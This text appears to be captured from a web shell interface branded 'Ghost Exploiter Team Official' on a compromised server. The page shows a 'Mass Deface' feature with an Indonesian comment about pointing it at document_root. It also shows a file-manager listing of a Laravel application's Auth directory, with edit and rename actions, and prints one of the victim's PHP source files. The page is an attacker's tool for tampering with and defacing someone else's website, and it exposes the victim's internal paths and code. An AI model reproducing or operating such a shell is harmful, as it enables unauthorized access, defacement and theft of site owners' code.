Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
app
/
Domain
/
Auth
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
Requests
--
ren
AuthService-20260128031
...
0.683KB
edt
ren
AuthService.php
0.683KB
edt
ren
FailedValidationExcepti
...
0.988KB
edt
ren
PaymentService.php
0KB
edt
ren
ResourceResponse.php
1.179KB
edt
ren
ResponseService.php
0.823KB
edt
ren
RoleTableSeeder.php
1.04KB
edt
ren
index.html
0.435KB
edt
ren
users.php
0.828KB
edt
ren
<?php declare(strict_types=1); namespace App\Responses; use Illuminate\Contracts\Support\Responsable; use Illuminate\Http\{JsonResponse, Response}; use Illuminate\Support\MessageBag; final readonly class FailedValidationExceptionResponse implements Responsable { private MessageBag $errors; public function __construct(MessageBag $errors) { $this->errors = $errors; } public function toResponse($request): JsonResponse { return new JsonResponse( data: [ 'status' => Response::HTTP_UNPROCESSABLE_ENTITY, 'data' => [ 'message' => __(key: 'Ошибка валидации!'), 'errors' => $this->errors ], 'metadata' => [ 'request_id' => str()->uuid()->toString(), 'timestamp' => now()->toIso8601String() ], ], status: Response::HTTP_UNPROCESSABLE_ENTITY ); } }